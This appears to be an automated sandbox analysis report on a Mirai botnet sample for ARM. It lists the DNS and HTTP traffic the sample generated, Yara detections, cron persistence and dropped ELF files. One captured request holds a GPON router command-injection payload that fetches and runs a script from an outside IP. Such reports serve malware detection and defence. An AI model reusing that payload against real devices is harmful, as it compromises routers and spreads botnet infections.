Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 78.138.138.136Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 195.161.62.154Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 45.130.41.118Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 195.208.1.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic DNS traffic detected: DNS query: akak.ru
Source: global traffic DNS traffic detected: DNS query: www.akak.ru
Source: global traffic DNS traffic detected: DNS query: ekac.ru
Source: global traffic DNS traffic detected: DNS query: www.ekac.ru
Source: global traffic DNS traffic detected: DNS query: kdaa.ru
Source: global traffic DNS traffic detected: DNS query: www.kdaa.ru
Source: global traffic DNS traffic detected: DNS query: cklb.ru
Source: global traffic DNS traffic detected: DNS query: www.cklb.ru
Source: global traffic DNS traffic detected: DNS query: kfck.ru
Source: global traffic DNS traffic detected: DNS query: www.kfck.ru
Source: global traffic DNS traffic detected: DNS query: affl.ru
Source: global traffic DNS traffic detected: DNS query: www.affl.ru
Source: global traffic DNS traffic detected: DNS query: aabd.ru
Source: global traffic DNS traffic detected: DNS query: www.aabd.ru
Source: global traffic DNS traffic detected: DNS query: kaac.ru
Source: global traffic DNS traffic detected: DNS query: www.kaac.ru
Source: global traffic DNS traffic detected: DNS query: ckea.ru
Source: global traffic DNS traffic detected: DNS query: eald.ru
Source: global traffic DNS traffic detected: DNS query: www.eald.ru
Source: global traffic DNS traffic detected: DNS query: www.ckea.ru
Source: global traffic DNS traffic detected: DNS query: feba.ru
Source: global traffic DNS traffic detected: DNS query: www.feba.ru
Source: global traffic DNS traffic detected: DNS query: bakd.ru
Source: global traffic DNS traffic detected: DNS query: www.bakd.ru
Source: global traffic DNS traffic detected: DNS query: aekc.ru
Source: global traffic DNS traffic detected: DNS query: www.aekc.ru
Source: global traffic DNS traffic detected: DNS query: acca.ru
Source: global traffic DNS traffic detected: DNS query: www.acca.ru
Source: global traffic DNS traffic detected: DNS query: clbc.ru
Source: global traffic DNS traffic detected: DNS query: www.clbc.ru
Source: global traffic DNS traffic detected: DNS query: bbaa.ru
Source: global traffic DNS traffic detected: DNS query: fack.ru
Source: global traffic DNS traffic detected: DNS query: www.bbaa.ru
Source: global traffic DNS traffic detected: DNS query: dfcl.ru
Source: global traffic DNS traffic detected: DNS query: www.dfcl.ru
Source: global traffic DNS traffic detected: DNS query: aekb.ru
Source: global traffic DNS traffic detected: DNS query: www.aekb.ru
Source: global traffic DNS traffic detected: DNS query: www.fack.ru
Source: global traffic DNS traffic detected: DNS query: kdfc.ru
Source: global traffic DNS traffic detected: DNS query: www.kdfc.ru
Source: global traffic DNS traffic detected: DNS query: lkfc.ru
Source: global traffic DNS traffic detected: DNS query: www.lkfc.ru
Source: global traffic DNS traffic detected: DNS query: fada.ru
Source: global traffic DNS traffic detected: DNS query: www.fada.ru
Source: global traffic DNS traffic detected: DNS query: feaa.ru
Source: global traffic DNS traffic detected: DNS query: www.feaa.ru
Source: global traffic DNS traffic detected: DNS query: dkel.ru
Source: global traffic DNS traffic detected: DNS query: fcdk.ru
Source: global traffic DNS traffic detected: DNS query: www.dkel.ru
Source: global traffic DNS traffic detected: DNS query: www.fcdk.ru
Source: global traffic DNS traffic detected: DNS query: eabb.ru
Source: global traffic DNS traffic detected: DNS query: kbll.ru
Source: global traffic DNS traffic detected: DNS query: www.kbll.ru
Source: global traffic DNS traffic detected: DNS query: fcea.ru
Source: global traffic DNS traffic detected: DNS query: www.fcea.ru
Source: global traffic DNS traffic detected: DNS query: fabf.ru
Source: global traffic DNS traffic detected: DNS query: www.fabf.ru
Source: global traffic DNS traffic detected: DNS query: calc.ru
Source: global traffic DNS traffic detected: DNS query: www.calc.ru
Source: global traffic DNS traffic detected: DNS query: www.eabb.ru
Source: global traffic DNS traffic detected: DNS query: alba.ru
Source: global traffic DNS traffic detected: DNS query: www.alba.ru
Source: global traffic DNS traffic detected: DNS query: kbak.ru
Source: global traffic DNS traffic detected: DNS query: eade.ru
Source: global traffic DNS traffic detected: DNS query: www.eade.ru
Source: global traffic DNS traffic detected: DNS query: back.ru
Source: global traffic DNS traffic detected: DNS query: www.back.ru
Source: global traffic DNS traffic detected: DNS query: www.kbak.ru
Source: global traffic DNS traffic detected: DNS query: alke.ru
Source: global traffic DNS traffic detected: DNS query: www.alke.ru
Source: global traffic DNS traffic detected: DNS query: dcae.ru
Source: global traffic DNS traffic detected: DNS query: www.dcae.ru
Source: global traffic DNS traffic detected: DNS query: lcfk.ru
Source: global traffic DNS traffic detected: DNS query: afab.ru
Source: global traffic DNS traffic detected: DNS query: www.afab.ru
Source: global traffic DNS traffic detected: DNS query: www.lcfk.ru
Source: global traffic DNS traffic detected: DNS query: ccel.ru
Source: global traffic DNS traffic detected: DNS query: www.ccel.ru
Source: global traffic DNS traffic detected: DNS query: cbbb.ru
Source: global traffic DNS traffic detected: DNS query: www.cbbb.ru
Source: global traffic DNS traffic detected: DNS query: call.ru
Source: global traffic DNS traffic detected: DNS query: www.call.ru
Source: global traffic DNS traffic detected: DNS query: fkcd.ru
Source: global traffic DNS traffic detected: DNS query: www.fkcd.ru
Source: global traffic DNS traffic detected: DNS query: efla.ru
Source: global traffic DNS traffic detected: DNS query: www.efla.ru
Source: global traffic DNS traffic detected: DNS query: faca.ru
Source: global traffic DNS traffic detected: DNS query: www.faca.ru
Source: global traffic DNS traffic detected: DNS query: edac.ru
Source: global traffic DNS traffic detected: DNS query: bacc.ru
Source: global traffic DNS traffic detected: DNS query: www.bacc.ru
Source: global traffic DNS traffic detected: DNS query: www.edac.ru
Source: global traffic DNS traffic detected: DNS query: aflb.ru
Source: global traffic DNS traffic detected: DNS query: www.aflb.ru
Source: global traffic DNS traffic detected: DNS query: edee.ru
Source: global traffic DNS traffic detected: DNS query: www.edee.ru
Source: global traffic DNS traffic detected: DNS query: dlab.ru
Source: global traffic DNS traffic detected: DNS query: www.dlab.ru
Source: global traffic DNS traffic detected: DNS query: ekal.ru
Source: global traffic DNS traffic detected: DNS query: www.ekal.ru
Source: unknown HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.1Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: firmware.armv5l.elf, type: SAMPLE Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6296.1.00007fea34017000.00007fea34031000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6271.1.00007fea34017000.00007fea34031000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6281.1.00007fea34017000.00007fea34031000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6273.1.00007fea34017000.00007fea34031000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6267.1.00007fea34017000.00007fea34031000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: /usr/bin/bvgwxkzljd, type: DROPPED Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: /usr/bin/xqshdzbvx, type: DROPPED Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Yara signature match
Source: firmware.armv5l.elf, type: SAMPLE Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6296.1.00007fea34017000.00007fea34031000.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6271.1.00007fea34017000.00007fea34031000.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6281.1.00007fea34017000.00007fea34031000.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6273.1.00007fea34017000.00007fea34031000.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6267.1.00007fea34017000.00007fea34031000.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: /usr/bin/bvgwxkzljd, type: DROPPED Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: /usr/bin/xqshdzbvx, type: DROPPED Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: classification engine Classification label: mal96.troj.evad.linELF@0/24@760/0

Persistence and Installation Behavior
barindex
Executes the "crontab" command typically for achieving persistence
Source: /bin/sh (PID: 6329) Crontab executable: /usr/bin/crontab -> crontab /var/spool/cron/crontabs/root Jump to behavior
Source: /bin/sh (PID: 6330) Crontab executable: /usr/bin/crontab -> crontab /var/spool/cron/crontabs/root Jump to behavior
Sample tries to persist itself using cron
Source: /tmp/firmware.armv5l.elf (PID: 6271) File: /var/spool/cron/crontabs/root Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6273) File: /var/spool/cron/crontabs/root Jump to behavior
Source: /usr/bin/crontab (PID: 6329) File: /var/spool/cron/crontabs/tmp.S0zdIK Jump to behavior
Source: /usr/bin/crontab (PID: 6329) File: /var/spool/cron/crontabs/root Jump to behavior
Source: /usr/bin/crontab (PID: 6330) File: /var/spool/cron/crontabs/tmp.vZkugQ Jump to behavior
Source: /usr/bin/crontab (PID: 6330) File: /var/spool/cron/crontabs/root Jump to behavior
Writes identical ELF files to multiple locations
Source: /tmp/firmware.armv5l.elf (PID: 6271) File with SHA-256 24220533C871AC106B98CEDCB345CD75D70DB5465765623C535C50A9FC195107 written: /usr/bin/xqshdzbvx Jump to dropped file
Source: /tmp/firmware.armv5l.elf (PID: 6273) File with SHA-256 24220533C871AC106B98CEDCB345CD75D70DB5465765623C535C50A9FC195107 written: /usr/bin/bvgwxkzljd Jump to dropped file
Executes commands using a shell command-line interpreter
Source: /tmp/firmware.armv5l.elf (PID: 6294) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6368) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6378) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6402) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6412) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6429) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6444) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6461) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6472) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6301) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6325) Shell command executed: sh -c "crontab /var/spool/cron/crontabs/root" Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6285) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6373) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6394) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6407) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6417) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6436) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6447) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6456) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6467) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6477) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6290) Shell command executed: sh -c "hostname -I" Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6327) Shell command executed: sh -c "crontab /var/spool/cron/crontabs/root" Jump to behavior
Executes the "hostname" command used to retrieve the computers name
Source: /bin/sh (PID: 6309) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 6370) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 6384) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 6404) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 6414) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 6435) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 6446) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 6463) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 6474) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 6310) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 6308) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 6375) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 6396) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 6409) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 6423) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 6438) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 6449) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 6458) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 6469) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 6479) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Source: /bin/sh (PID: 6311) Hostname executable: /usr/bin/hostname -> hostname -I Jump to behavior
Sample tries to set the executable flag
Source: /tmp/firmware.armv5l.elf (PID: 6271) File: /bin/xqshdzbvx (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/firmware.armv5l.elf (PID: 6273) File: /bin/bvgwxkzljd (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Writes ELF files to disk
Source: /tmp/firmware.armv5l.elf (PID: 6271) File written: /usr/bin/xqshdzbvx Jump to dropped file
Source: /tmp/firmware.armv5l.elf (PID: 6273) File written: /usr/bin/bvgwxkzljd Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Drops files in suspicious directories
Source: /tmp/firmware.armv5l.elf (PID: 6271) File: /usr/bin/xqshdzbvx Jump to dropped file
Source: /tmp/firmware.armv5l.elf (PID: 6273) File: /usr/bin/bvgwxkzljd Jump to dropped file
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 33764 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 33766 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 50118 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 33770 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 50122 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 33774 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 50126 -> 81
